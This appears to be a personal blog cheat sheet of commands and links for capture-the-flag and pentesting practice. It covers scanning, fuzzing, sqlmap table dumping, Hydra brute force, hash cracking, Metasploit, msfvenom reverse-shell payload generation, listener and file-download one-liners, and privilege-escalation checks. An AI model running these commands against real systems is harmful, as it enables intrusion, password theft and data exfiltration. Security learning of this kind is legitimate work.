ToolBox

Last Update : 05/18/2022

Note: This page is a temporary one; a more definitive version is under construction at wiki.d3vyce.fr.

The objective of this blog page is to gather the different tools I use on a daily basis to solve CTFs. This article will evolve and be enriched as time goes by.

I recommend these blogs if you are looking to learn new things in Pentesting:

HacknDo Blog
HackTricks Blog

Online Tools

Exploit-DB
CTF Tools

CyberChef
Crackstation
Hash Analyser
FotoForensics

Run Code Online

Linux Tools

Nmap

nmap documentation
nmap script list

Basic Scan : nmap -sV -T4 -Pn [IP]
UDP Scan : sudo nmap -sU --min-rate 5000 [IP]
SMB Scan : nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse [IP]
SMB Scan (alternative) : nmap -p445,135,139 --script="safe or smb-enum-*" [IP]
RPC Scan : nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount [IP]

FFUF

Wordlists

Directory scan : ffuf -c -u http://[IP]/FUZZ -w common.txt -recursion -recursion-depth 2
Subdomain scan : ffuf -c -u http://[IP] -w subdomains.txt -H "Host: FUZZ.[IP]" -fw xx

SQLmap

Injection check : sqlmap -r request.txt --batch
Database listing : sqlmap -r request.txt --dbs --batch
Table listing : sqlmap -r request.txt -D [data_base] --tables --batch
Dump table : sqlmap -r request.txt -D [data_base] -T [table] --dump --batch

request.txt : the raw HTTP request, copied from Burp

Hydra

SSH Brute Force : hydra -l jan -P rockyou.txt ssh://[IP]
Post Form Brute Force : hydra -f -l admin -P /usr/share/wordlists/rockyou.txt [IP] http-post-form "[Page]:VIEWSTATE + USER + PASS:Login failed"

John

SSH : ssh2john.py key.rsa > result.txt
ZIP : zip2john file.zip > result.txt
RAR : rar2john file.rar > result.txt

john result.txt --wordlist=rockyou.txt

Hashcat

Hash mode numbers (hashcat example hashes)

MD5 : hashcat -m 0 hash rockyou.txt

Metasploit

Nmap scan stored in the database : db_nmap -sV [IP]
List of vulns from nmap scan : vulns
Search for module : search [text]
Use module : use [path_to_module]
List of options for selected module : options
Set option value : set [option] [value]
Show running sessions : sessions
Enter a session (CTRL-Z to background it) : sessions -i [id_session]
List of available payloads : show payloads
Set payload value : set PAYLOAD [payload_name]
Start module : run or exploit

SMB

Check anonymous access : smbclient --no-pass -L //[IP]
User/Share enumeration : enum4linux -a [IP]

Linux Command

Copy file over SSH : scp [FILE] [user]@[IP]:[folder]
Search exploit : searchsploit [NAME]
Download exploit : searchsploit -x [code] > [FILE]
SSH Port Forwarding : ssh -L [local_port]:127.0.0.1:[target_port] -N [target_user]@[target_ip]
File server : python3 -m http.server 8080
Download from file server : wget [IP]:8080/[file]
Open port : nc -nlvp 1234
Upgrade reverse shell : python3 -c 'import pty; pty.spawn("/bin/bash")'
List listening ports : netstat -lntu
Telnet with user : telnet [IP] -l [user]
MySQL with host : mysql -h [IP] -u [user] -p
Find file : find / -name [name] 2>/dev/null
List cron jobs : cat /etc/crontab
Decode Base64 : base64 -d <<< [string]
Encode Base64 : base64 <<< [string]
Decode hex : xxd -r -p <<< [string]
HTTP headers : curl -I [IP]

Reverse Shell

Reverse Shell Cheat Sheet
Reverse Shell Generator
Reverse Shell Kali : /usr/share/webshells

Reverse Shell Windows (.exe)

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=1234 -f exe -o shell.exe
msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=[IP] lport=1234 -f aspx -o shell.aspx

Windows

AD Enumeration

BloodHound

sudo neo4j console
bloodhound

AD Control Paths
Group3r
Snaffler
CrackMapExec

Exploit Suggester Metasploit : post/multi/recon/local_exploit_suggester

Powershell

Download a file via PowerShell

powershell -c "Invoke-WebRequest -Uri 'http://[IP]/[File]' -OutFile 'c:[…]'"

Privilege Escalation

Linux : linPEAS
Windows : winPEAS

Find SUID files : find / -perm -u=s -type f 2>/dev/null

GTFOBins

OSINT

OSINT Framework
Awesome OSINT
OSINT Techniques

Recon Tools

Maigret
GHunt

Advanced Googling

Google Search Operators

Exact term search : "[term]"
Exclude term : -[term]
Search within a website : site:[site] "[term]"
Search file type : filetype:[type]
Search in URL : inurl:[term]
Search in text : intext:[term]